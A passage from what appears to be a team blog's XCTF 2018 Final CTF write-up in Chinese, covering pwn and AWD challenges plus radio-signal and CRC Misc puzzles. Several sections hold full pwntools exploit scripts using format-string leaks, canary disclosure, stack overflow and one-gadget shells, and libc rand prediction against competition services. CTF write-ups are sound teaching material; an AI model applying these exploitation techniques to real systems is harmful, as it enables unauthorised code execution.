class="params">(x)</span>:</span></span><br><span class="line">    p.send(x)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">sl</span><span class="params">(x)</span>:</span></span><br><span class="line">    p.sendline(x)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">input_raw</span><span class="params">(x)</span>:</span></span><br><span class="line">    sl(<span class="string">'1'</span>)</span><br><span class="line">    ru(<span class="string">'please input your raw text'</span>)</span><br><span class="line">    sl(x)</span><br><span class="line">    ru(<span class="string">'&amp;gt;'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">inn</span><span class="params">(idx,id,content,title,desc)</span>:</span></span><br><span class="line">    sl(str(idx))</span><br><span class="line">    ru(<span class="string">'Where you want to edit/input?'</span>)</span><br><span class="line">    sl(str(id))</span><br><span class="line">    ru(<span class="string">'please input content'</span>)</span><br><span class="line">    se(content)</span><br><span class="line">    ru(<span class="string">'input your title'</span>)</span><br><span class="line">    se(title)</span><br><span class="line">    ru(<span class="string">'input your description&amp;#92;n&amp;gt;'</span>)</span><br><span class="line">    se(desc)</span><br><span class="line">    ru(<span class="string">'&amp;gt;'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">export</span><span class="params">(idx,id1,id2)</span>:</span></span><br><span class="line">    sl(str(idx))</span><br><span class="line">    ru(<span class="string">'Which book you want to export'</span>)</span><br><span class="line">    sl(str(id1))</span><br><span class="line">    ru(<span class="string">'where you want to output'</span>)</span><br><span class="line">    sl(str(id2))</span><br><span class="line">    ru(<span class="string">'&amp;gt;'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">mexit</span><span class="params">()</span>:</span></span><br><span class="line">    sl(<span class="string">'q'</span>)</span><br><span class="line">    ru(<span class="string">'Are you sure you want to exit?(y/n)'</span>)</span><br><span class="line">    sl(<span class="string">'n'</span>)</span><br><span class="line">    ru(<span class="string">'&amp;gt;'</span>)</span><br><span class="line"></span><br><span class="line">sl(<span class="string">'6'</span>)</span><br><span class="line">ru(<span class="string">'what do you want to proofread?'</span>)</span><br><span class="line">sl(<span class="string">'1'</span>)</span><br><span class="line">ru(<span class="string">'which one you want to proofread?'</span>)</span><br><span class="line">sl(<span class="string">'1'</span>)</span><br><span class="line">ru(<span class="string">'how many words you assume are same?'</span>)</span><br><span class="line">sl(<span class="string">'400'</span>)</span><br><span class="line">ru(<span class="string">'&amp;#92;x00'</span>*<span class="number">0x108</span>)</span><br><span class="line"></span><br><span class="line">data=ru(<span class="string">'&amp;#92;n'</span>)[:<span class="number">-1</span>]</span><br><span class="line">pbase=u64(data[:<span class="number">8</span>])<span class="number">-0x138F</span></span><br><span class="line"></span><br><span class="line">libc=u64(data[<span class="number">-8</span>:])</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug:</span><br><span class="line">    base=libc<span class="number">-0x20830</span></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    base=libc<span class="number">-0x21F45</span></span><br><span class="line"></span><br><span class="line">ru(<span class="string">'&amp;gt;'</span>)</span><br><span class="line"></span><br><span class="line">inn(<span class="number">3</span>,<span class="number">1</span>,<span class="string">'a'</span>*<span class="number">0xff</span>,<span class="string">'b'</span>*<span class="number">0x1f</span>,<span class="string">'c'</span>*<span class="number">0x80</span>+p32(<span class="number">0</span>)+p32(<span class="number">0x300</span>)+cyclic(<span class="number">0x77</span>))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">inn(<span class="number">2</span>,<span class="number">2</span>,cyclic(<span class="number">1</span>),<span class="string">'q'</span>*<span class="number">0x1f</span>,cyclic(<span class="number">1</span>))</span><br><span class="line">payload=<span class="string">'a'</span>*<span class="number">120</span>+p64(pbase+<span class="number">0x203000</span>+<span class="number">0x100</span>)+cyclic(<span class="number">8</span>)+p64(pbase+<span class="number">0x203000</span>+<span class="number">0x100</span>)+<span class="string">'a'</span>*<span class="number">8</span>+p64(base+<span class="number">0x4647c</span>)</span><br><span class="line"></span><br><span class="line">inn(<span class="number">3</span>,<span class="number">3</span>,cyclic(<span class="number">0xff</span>),<span class="string">'b'</span>*<span class="number">0x1f</span>,payload)</span><br><span class="line">export(<span class="number">4</span>,<span class="number">1</span>,<span class="number">1</span>)</span><br><span class="line">export(<span class="number">4</span>,<span class="number">3</span>,<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">sl(<span class="string">'7'</span>)</span><br><span class="line">ru(<span class="string">'what do you want to delete?'</span>)</span><br><span class="line">sl(<span class="string">'1'</span>)</span><br><span class="line">ru(<span class="string">'which one you want to delete?'</span>)</span><br><span class="line">sl(<span class="string">'2'</span>)</span><br><span class="line">print(hex(pbase))</span><br><span class="line">print(hex(libc))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h1><h2 id="Mysterious-signals"><a href="#Mysterious-signals" class="headerlink" title="Mysterious signals"></a>Mysterious signals</h2><p>hint:无线射频频谱 radio frequency spectrum</p>
<p>使用cool edit pro2打开文件,在”查看”一栏选择”光谱显示窗”即可看到flag<br><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Misc/Mysterious_00.png" alt></p>
<blockquote>
<p>flag:flag{756e69636f726e}</p>
</blockquote>
<h2 id="核弹遥控器密码"><a href="#核弹遥控器密码" class="headerlink" title="核弹遥控器密码"></a>核弹遥控器密码</h2><p>hint:芯片型号pt2242,24位有效数据 pt2242 chipset, 24 bits of valid data</p>
<p>pt2242是固定码芯片</p>
<p>通过inspectrum(<a href="https://github.com/miek/inspectrum" target="_blank" rel="noopener">https://github.com/miek/inspectrum</a>)这个工具来分析信号</p>
<p>结合<a href="https://www.freebuf.com/articles/wireless/146781.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/wireless/146781.html</a> 教程，可以调出：</p>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Misc/N-bomb_00.png" alt></p>
<p>其中，高电平长的为1，低电平长的为0</p>
<p>00000001011110100101100<br>转16进制为flag，17A59<br>吐槽一下，一开始出题人没说flag是16进制大写，害得我们试了好久，还以为方法错了</p>
<blockquote>
<p>flag:17A59</p>
</blockquote>
<h2 id="诡异的校验"><a href="#诡异的校验" class="headerlink" title="诡异的校验"></a>诡异的校验</h2><p>捕获到一份受干扰的信号文件，万幸的是被干扰的部分只是数据校验部位，必须要根据仅剩的信号还原出全部数据（十六进制）                </p>
<p>hint1:<a href="http://ingelect.esy.es/pdf/FXTH871x7.pdf" target="_blank" rel="noopener">http://ingelect.esy.es/pdf/FXTH871x7.pdf</a>      20959185b1115208(射频文件解码后的数据)<br><a href="http://ingelect.esy.es/pdf/FXTH871x7.pdf" target="_blank" rel="noopener">http://ingelect.esy.es/pdf/FXTH871x7.pdf</a>                 20959185b1115208(data of decoded spectrum file)<br>hint2:We have updated the challenge information, add English description as below: We captured a disturbed signal file, fortunately, only the checksum has been disturbed, you should recover all the data according to the remaining signals(hex).</p>
<p>在github上搜索FXTH871x7，找到这个：</p>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Misc/crc_00.png" alt></p>
<p>猜测校验位置是crc</p>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Misc/crc_01.png" alt></p>
<p>计算出crc16</p>
<p>拼接到数据后面得到flag</p>
<blockquote>
<p>flag:20959185b1115208133f</p>
</blockquote>
<h1 id="AWD"><a href="#AWD" class="headerlink" title="AWD"></a>AWD</h1><h2 id="pubg"><a href="#pubg" class="headerlink" title="pubg"></a>pubg</h2><p>漏洞其实挺明显的，首先gou那个函数 有一个格式化字符串漏洞，可以leak一些地址，利用%x%x%x%lx能leak到一个ld.so附近的地址</p>
<p>在gou函数那里，它还会让你猜3个byte的随机数，如果强行爆破的话是不行的，因为概率是1/(256*256*256)</p>
<p>但是格式化字符串漏洞%x%x，第二个leak出来的东西是猜中的数量，所以利用这个就可以爆破出来，爆破最多256*3次就行了</p>
<p>爆破完之后到gang那个函数有一个任意读，利用上面leak的ld.so附近的地址，可以leak出canary，因为canary会在那附近存一下</p>
<p>任意读完之后，有一个栈溢出，利用栈溢出就可以进行rop来get shell</p>
<p>这里还有一个坑点就是，本地ld.so和libc.so的偏移和服务器的不同，后面强行爆破了一波</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">debug=<span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#context.log_level='debug'</span></span><br><span class="line">e=ELF(<span class="string">'./libc-2.23.so'</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug:</span><br><span class="line">    p=process(<span class="string">'./pubg'</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    p=remote(<span class="string">'192.168.20.11'</span>,<span class="number">20001</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">ru</span><span class="params">(x)</span>:</span></span><br><span class="line">    <span class="keyword">return</span> p.recvuntil(x)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">se</span><span class="params">(x)</span>:</span></span><br><span class="line">    p.send(x)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">sl</span><span class="params">(x)</span>:</span></span><br><span class="line">    p.sendline(x)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">choose</span><span class="params">(x,s)</span>:</span></span><br><span class="line">    ru(<span class="string">'&amp;gt; '</span>)</span><br><span class="line">    sl(str(x))</span><br><span class="line">    ru(<span class="string">'which one is your favorite?'</span>)</span><br><span class="line">    sl(str(s))</span><br><span class="line">    ru(<span class="string">'&amp;gt; '</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">gou</span><span class="params">(x,con=False)</span>:</span></span><br><span class="line">    sl(<span class="string">'2'</span>)</span><br><span class="line">    ru(<span class="string">'Maybe you can get an airdrop. Tell me your position:&amp;#92;n'</span>)</span><br><span class="line">    sl(x)</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> con:</span><br><span class="line">        data=ru(<span class="string">' has'</span>)[:<span class="number">-4</span>]</span><br><span class="line">        ru(<span class="string">'&amp;gt; '</span>)</span><br><span class="line">        <span class="keyword">return</span> data</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        ru(<span class="string">'&amp;gt; '</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">gang</span><span class="params">(x)</span>:</span></span><br><span class="line">    sl(<span class="string">'1'</span>)</span><br><span class="line">    ru(<span class="string">'Winner winner,chicken dinner. The whole memory is yours, now pick one chicken:'</span>)</span><br><span class="line">    sl(str(x))</span><br><span class="line">    ru(<span class="string">'The '</span>)</span><br><span class="line">    cookie=ru(<span class="string">' ch'</span>)[:<span class="number">-3</span>]</span><br><span class="line">    cookie=cookie[:<span class="number">15</span>]</span><br><span class="line">    </span><br><span class="line">    payload=cyclic(<span class="number">40</span>)+<span class="string">'&amp;#92;x00'</span>+cookie+p64(base+<span class="number">0x4526a</span>)+<span class="string">'&amp;#92;x00'</span>*<span class="number">0x100</span></span><br><span class="line">    sl(payload)    </span><br><span class="line"></span><br><span class="line">     </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">brute</span><span class="params">()</span>:</span></span><br><span class="line">    secert=<span class="string">''</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">3</span>):</span><br><span class="line">        <span class="keyword">for</span> q <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">256</span>):</span><br><span class="line">            <span class="keyword">if</span> chr(q)==<span class="string">'$'</span> <span class="keyword">or</span> chr(q)==<span class="string">'*'</span> <span class="keyword">or</span> chr(q)==<span class="string">'n'</span>:</span><br><span class="line">                <span class="keyword">continue</span></span><br><span class="line">            <span class="keyword">if</span> gou(secert+chr(q)+<span class="string">'%x%x'</span>)[i+<span class="number">3</span>]==str(i+<span class="number">1</span>):</span><br><span class="line">                secert+=chr(q)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">return</span> secert</span><br><span class="line"></span><br><span class="line">   </span><br><span class="line">choose(<span class="number">1</span>,<span class="number">1</span>)</span><br><span class="line">libc=int(gou(<span class="string">'%x%x%x%lx'</span>)[<span class="number">5</span>:],<span class="number">16</span>)</span><br><span class="line">tbase=libc<span class="number">-0x5D3700</span></span><br><span class="line"><span class="keyword">if</span> debug:</span><br><span class="line">    base=tbase</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    base=libc<span class="number">-0x5D3700</span><span class="number">-0x4000</span><span class="number">-0x16000</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">secert=brute()+<span class="string">'&amp;#92;00'</span></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">gou(secert,<span class="keyword">True</span>)</span><br><span class="line">gang(tbase+<span class="number">0x5D3728</span>+<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">ru(<span class="string">'icken is on your plate, enjoy it~'</span>)</span><br><span class="line">p.sendline(<span class="string">'cat flag'</span>)</span><br><span class="line">flag=ru(<span class="string">'&amp;#92;n'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="randbattle"><a href="#randbattle" class="headerlink" title="randbattle"></a>randbattle</h2><p>这题相对简单点，所以就做了这题，不过这题出得有点恶心，能搅屎……….</p>
<p>首先题目有3个选项</p>
<ol>
<li>Double Dice Game</li>
<li>Triple Dice Game</li>
<li>Combination Game</li>
</ol>
<p>首先先来说下第一个功能</p>
<p><strong>Double Dice Game</strong></p>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/AWD/randbattle_00.png" alt></p>
<p>它会rand三个数，然后让你去猜，假如说你没进第三个功能，那么一开始就是srand(0)的，因此这三个数是固定的</p>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/AWD/randbattle_01.png" alt><br>如果三个数都成功猜中，它会让你输入5byte，但实际是4byte的密码，然后读取flag，用输入的密码加密，加密的方法是tea加密</p>
<p>加密完之后，它会判断是否存在一个 /tmp/qualiii 这个文件，如果存在的话就会返回上一层</p>
<p>不存在的话，它会创建并将flag写入到其中，然后sleep，sleep完之后，如果文件还存在的话，就会打印加密后的flag</p>
<p><strong>Triple Dice Game</strong></p>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/AWD/randbattle_02.png" alt></p>
<p>这里分为3个部分</p>
<p>第一个函数会首先srand(time(0)) 然后再rand了三个字母，第二个函数打印这三个字母，然后第三个函数是读取的，读取然后之后判断输入是否正确</p>
<p>如果正确的话，会进到最后一个函数</p>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/AWD/randbattle_03.png" alt></p>
<p>这里还是让你猜3个数，猜中之后</p>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/AWD/randbattle_04.png" alt><br>能删除 /tmp/qualiii这个文件</p>
<p><strong>Combination Game</strong></p>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/AWD/randbattle_05.png" alt></p>
<p>前面是猜字母加猜数字</p>
<p>猜中之后，能打印出/tmp/qualiii的内容</p>
<p>下面是一个简单的payload，没人竞争的时候能读出flag，至于怎么心机的利用这几个功能去搅屎和反搅屎，这里就不多说了…….（策略太多了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line">LIBC = ctypes.cdll.LoadLibrary(<span class="string">'/lib/x86_64-linux-gnu/libc-2.23.so'</span>)</span><br><span class="line"></span><br><span class="line">debug=<span class="number">1</span></span><br><span class="line"></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug:</span><br><span class="line">    p=process(<span class="string">'./randbattle'</span>)</span><br><span class="line">    <span class="comment">#p=process('',env=&#123;'LD_PRELOAD':'./libc.so'&#125;)</span></span><br><span class="line">    gdb.attach(p)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    p=remote(<span class="string">'192.168.20.13'</span>,<span class="number">20003</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">ru</span><span class="params">(x)</span>:</span></span><br><span class="line">    <span class="keyword">return</span> p.recvuntil(x)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">se</span><span class="params">(x)</span>:</span></span><br><span class="line">    p.send(x)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">sl</span><span class="params">(x)</span>:</span></span><br><span class="line">    p.sendline(x)</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">decipher</span><span class="params">(v, k)</span>:</span></span><br><span class="line">    y = c_uint32(v[<span class="number">0</span>])</span><br><span class="line">    z = c_uint32(v[<span class="number">1</span>])</span><br><span class="line">    sum = c_uint32(<span class="number">0xc6ef3720</span>)</span><br><span class="line">    delta = <span class="number">0x9e3779b9</span></span><br><span class="line">    n = <span class="number">32</span></span><br><span class="line">    w = [<span class="number">0</span>,<span class="number">0</span>]</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span>(n&amp;gt;<span class="number">0</span>):</span><br><span class="line">        z.value -= ( y.value &amp;lt;&amp;lt; <span class="number">4</span> ) + k[<span class="number">2</span>] ^ y.value + sum.value ^ ( y.value &amp;gt;&amp;gt; <span class="number">5</span> ) + k[<span class="number">3</span>]</span><br><span class="line">        y.value -= ( z.value &amp;lt;&amp;lt; <span class="number">4</span> ) + k[<span class="number">0</span>] ^ z.value + sum.value ^ ( z.value &amp;gt;&amp;gt; <span class="number">5</span> ) + k[<span class="number">1</span>]</span><br><span class="line">        sum.value -= delta</span><br><span class="line">        n -= <span class="number">1</span></span><br><span class="line"></span><br><span class="line">    w[<span class="number">0</span>] = y.value</span><br><span class="line">    w[<span class="number">1</span>] = z.value</span><br><span class="line">    <span class="keyword">return</span> w</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">tdice</span><span class="params">()</span>:</span></span><br><span class="line">    sl(<span class="string">'2'</span>)</span><br><span class="line">    ru(<span class="string">'case2'</span>)</span><br><span class="line">    <span class="keyword">if</span> debug:</span><br><span class="line">        LIBC.srand(LIBC.time(<span class="number">0</span>))</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        LIBC.srand(LIBC.time(<span class="number">0</span>)<span class="number">-20</span>)    </span><br><span class="line">    s=[LIBC.rand()%<span class="number">26</span>+<span class="number">65</span> <span class="keyword">for</span> _ <span class="keyword">in</span> range(<span class="number">3</span>)]</span><br><span class="line">    w=<span class="string">''</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> s:</span><br><span class="line">        w+=chr(i)</span><br><span class="line">    w+=<span class="string">'&amp;#92;x00'</span></span><br><span class="line">    se(w)</span><br><span class="line">    ru(<span class="string">'num:'</span>)</span><br><span class="line">    sl(str(LIBC.rand()%<span class="number">3</span>))</span><br><span class="line">    ru(<span class="string">'num:'</span>)</span><br><span class="line">    sl(str(LIBC.rand()%<span class="number">3</span>))</span><br><span class="line">    ru(<span class="string">'num:'</span>)</span><br><span class="line">    sl(str(LIBC.rand()%<span class="number">3</span>))</span><br><span class="line">    ru(<span class="string">'Your choice:'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">ddice</span><span class="params">()</span>:</span></span><br><span class="line">    sl(<span class="string">'1'</span>)</span><br><span class="line">    ru(<span class="string">'num:'</span>)</span><br><span class="line">    sl(str(LIBC.rand()%<span class="number">6</span>))</span><br><span class="line">    ru(<span class="string">'num:'</span>)</span><br><span class="line">    sl(str(LIBC.rand()%<span class="number">6</span>))</span><br><span class="line">    ru(<span class="string">'Set your pass:'</span>)</span><br><span class="line">    se(<span class="string">'&amp;#92;x00'</span>*<span class="number">5</span>)</span><br><span class="line">    ru(<span class="string">'Here is your gift:&amp;#92;n'</span>)</span><br><span class="line">    flag=ru(<span class="string">'C U'</span>)[:<span class="number">-3</span>]</span><br><span class="line">    flag=flag.split(<span class="string">':'</span>)</span><br><span class="line">    flag=[chr(int(i,<span class="number">16</span>)) <span class="keyword">for</span> i <span class="keyword">in</span> flag]</span><br><span class="line">    w=<span class="string">''</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> flag:</span><br><span class="line">        w+=i</span><br><span class="line">    t=[]</span><br><span class="line">    key=[<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>]</span><br><span class="line">    flag=<span class="string">''</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,len(w),<span class="number">4</span>):</span><br><span class="line">        t.append(u32(w[i:i+<span class="number">4</span>]))</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,len(t),<span class="number">2</span>):</span><br><span class="line">        q=decipher(t[i:i+<span class="number">2</span>],key)</span><br><span class="line">        flag+=p32(q[<span class="number">0</span>])</span><br><span class="line">        flag+=p32(q[<span class="number">1</span>])</span><br><span class="line">    <span class="keyword">return</span> flag</span><br><span class="line"></span><br><span class="line">tdice()</span><br><span class="line">print(ddice())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
    </div>

    

    
        <div class="post-tags">
            <i class="fa fa-tags" aria-hidden="true"></i>
            <a href="/tags/ctf/">#ctf</a> <a href="/tags/re/">#re</a> <a href="/tags/web/">#web</a> <a href="/tags/crypto/">#crypto</a> <a href="/tags/pwn/">#pwn</a> <a href="/tags/misc/">#misc</a> <a href="/tags/writeup/">#writeup</a> <a href="/tags/xctf/">#xctf</a>
        </div>
    

    <!-- Comments -->
    

</div>
        </section>

    </div>
</div>


</div>

<!-- Footer -->
<div class="push"></div>

<footer class="footer-content">
    <div class="container">
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-6 col-lg-6 footer-about">
                <h2>About</h2>
                <p>
                    De1ta-Team: De1iver the tea
                </p>
            </div>
            
    <div class="col-xs-6 col-sm-6 col-md-3 col-lg-3 recent-posts">
        <h2>Recent Posts</h2>
        <ul>
            
            <li>
                <a class="footer-post" href="/2099/05/22/Write-ups-for-CTFs/">Write ups for CTFs</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2019/08/19/SUCTF2019/">SUCTF 2019 Writeup</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2019/08/08/de1ctf2019 Writeup/">De1ctf 2019 Writeup</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2019/06/24/sctf2019/">SCTF 2019 Writeup</a>
            </li>
            
        </ul>
    </div>



            
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <ul class="list-inline footer-social-icons">
                    
                    <li class="list-inline-item">
                        <a href="https://github.com/De1ta-team">
                            <span class="footer-icon-container">
                                <i class="fa fa-github"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    
                    
                    
                    
                    
                    
                    
                    
                    <li class="list-inline-item">
                        <a href="/atom.xml">
                            <span class="footer-icon-container">
                                <i class="fa fa-rss"></i>
                            </span>
                        </a>
                    </li>
                    
                </ul>
            </div>
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <div class="footer-copyright">
                    @De1ta-Team. All right reserved
                </div>
            </div>
        </div>
    </div>
</footer>

<!-- After footer scripts -->

<!-- jQuery -->
<script src="//code.jquery.com/jquery-2.1.4.min.js"></script>

<!-- Tween Max -->
<script src="//cdnjs.cloudflare.com/ajax/libs/gsap/1.18.5/TweenMax.min.js"></script>

<!-- Gallery -->
<script src="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.js" type="text/javascript" charset="utf-8"></script>

<!-- Custom JavaScript -->
<script src="/js/main.js"></script>

<!-- Disqus Comments -->



</body>

</html>